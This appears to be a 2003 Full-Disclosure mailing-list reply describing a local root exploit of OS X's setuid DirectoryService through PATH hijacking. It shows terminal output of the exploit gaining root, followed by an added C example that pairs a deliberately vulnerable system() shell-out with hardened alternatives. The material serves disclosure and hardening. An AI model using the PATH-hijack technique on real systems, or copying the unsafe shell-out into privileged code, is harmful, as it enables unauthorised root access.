Re: [Full-Disclosure] OS X DirectoryService DoS {@stake adv:

From: Neeko Oni (neeko@haackey.com)
Date: 04/18/03

    From: Neeko Oni <neeko@haackey.com>
    To: full-disclosure@lists.netsys.com
    Date: Thu, 17 Apr 2003 22:15:35 -0700 (PDT)
    

    Hoping to encourage people to figure out what @stake was talking about
    in regards to the OS X DirectoryService DoS, I've attached a local
    exploit for DirectoryService _once it has been crashed/killed_.

    [sera:~] loser% gcc osxds.c -o touch
    [sera:~] loser% ./touch
    Original path: /bin:/sbin:/usr/bin:/usr/sbin
    New path: .
    Executing DirectoryService with false PATH...
    Forked DirectoryService, pausing before shell exec...
    sh: rm: command not found
    Cross your fingers.
    Path restored: /bin:/sbin:/usr/bin:/usr/sbin
    euid is root.
    root:~# id
    uid=0(root) gid=20(staff) groups=20(staff)
    root:~#

    >
    > Neeko Oni wrote:
    >
    > >Ok, the PATH problem is self-explanatory (and has been exploited once
    > >the DirectoryService process has crashed) but I've had some difficulty
    > >reproducing the DoS attack claim. I've got a 10.2.4 machine sitting
    > >right next to me, I believe it's a stock install, but DirectoryService
    > >doesn't bind 625. DirectoryService doesn't bind any ports and
    > >furthermore nothing binds 625 at all.
    > >
    > >Has anyone reproduced the DoS in that advisory?
    >
    > I also read the advisory and of the two MacOS machines that I am able
    > to access (only one locally) I can confirm that on the machine that
    > I don't have local access there was a daemon running on port 625 and
    > as the advisory states I was able to reproduce the DoS attack. I'm
    > not sure exactly which version of MacOS X that machine was running
    > but the daemon did crash and refuse connection.
    >
    > On the machine that I know for a fact is 10.2.4 and have local access to,
    > DirectoryService was setuid root and was running but there was no port
    > 625 open. I haven't port scanned the machine to check other ports yet
    > so I'm not ruling out the possibility it's running on a different port
    > just yet.
    >
    > Has anyone else looked into this matter... ?
    >
    > -subversive
    > --
    > ______________________________________________
    > http://www.linuxmail.org/
    > Now with e-mail forwarding for only US$5.95/yr
    >
    > Powered by Outblaze
    >


    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
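The transcript above shows the defect class rather than the exploit source: a setuid-root DirectoryService runs `rm` through `sh` with the PATH it inherited from the caller, so the shell resolves `rm` against whatever that PATH names. The C program below is an added example, not osxds.c and not Apple's code; it puts the unsafe pattern next to two hardened alternatives (a direct `unlink()`, and an `execve()` with an absolute path and a fixed environment) and a start-up PATH check a privileged program can apply before it execs any tool. All function names are my own; `SAFE_PATH` is the path string the transcript shows restored.

```c
/* Added example (not osxds.c, not Apple's DirectoryService code): the defect
 * class from the post, a privileged program shelling out to "rm" with an
 * inherited PATH, beside two hardened alternatives and a start-up PATH check.
 * SAFE_PATH mirrors the path shown in the transcript; names are assumptions. */
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

#define SAFE_PATH "/bin:/sbin:/usr/bin:/usr/sbin"

/* Returns 1 when every PATH element is an absolute directory, 0 otherwise.
 * An empty element, ".", or any relative element makes sh resolve "rm"
 * against the current working directory, which is the bug the post exploits. */
int path_is_trustworthy(const char *path)
{
    if (path == NULL || *path == '\0')
        return 0;                    /* no PATH at all: libc default may include "." */
    const char *p = path;
    for (;;) {
        const char *end = strchr(p, ':');
        size_t len = end ? (size_t)(end - p) : strlen(p);
        if (len == 0 || p[0] != '/')
            return 0;
        if (end == NULL)
            return 1;
        p = end + 1;
    }
}

/* Start-up mitigation: a setuid program should replace PATH with a value it
 * controls rather than trust the one it inherited. Returns 1 on success. */
int force_safe_path(void)
{
    if (setenv("PATH", SAFE_PATH, 1) != 0)
        return 0;
    return path_is_trustworthy(getenv("PATH"));
}

/* VULNERABLE PATTERN, kept only for contrast: system() runs "sh -c", and sh
 * looks "rm" up in the caller's PATH. Never call this from a privileged process. */
int remove_file_unsafe(const char *target)
{
    char cmd[4096];
    snprintf(cmd, sizeof cmd, "rm -f %s", target);
    return system(cmd);
}

/* Hardened alternative 1: no shell and no external tool at all. */
int remove_file_direct(const char *target)
{
    return unlink(target) == 0 ? 0 : errno;
}

/* Hardened alternative 2, for when an external tool is unavoidable: absolute
 * program path (PATH is never consulted), no shell, and an explicit minimal
 * environment instead of the inherited one. */
int remove_file_exec(const char *target)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { "/bin/rm", "-f", (char *)target, NULL };
        char *const envp[] = { "PATH=" SAFE_PATH, NULL };
        execve(argv[0], argv, envp);
        _exit(127);                  /* only reached if execve failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Creates a temporary file, removes it with unlink(), and reports 1 if it is gone. */
int remove_roundtrip_direct(void)
{
    char name[] = "/tmp/osxds-demo-XXXXXX";    /* constructed sample target */
    int fd = mkstemp(name);
    if (fd < 0)
        return 0;
    close(fd);
    if (remove_file_direct(name) != 0)
        return 0;
    return access(name, F_OK) != 0;
}

int main(void)
{
    const char *inherited = getenv("PATH");
    printf("inherited PATH %s\n", path_is_trustworthy(inherited)
           ? "is trustworthy" : "has a relative or empty element; refusing to exec tools");
    printf("forced PATH ok: %d\n", force_safe_path());
    printf("unlink round trip: %s\n", remove_roundtrip_direct() ? "ok" : "failed");
    return 0;
}
```

Run it with `PATH=. ./a.out` to see the check reject the same PATH the transcript uses; the unlink round trip is the one to prefer, since a program that never execs anything cannot be redirected by PATH in the first place.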


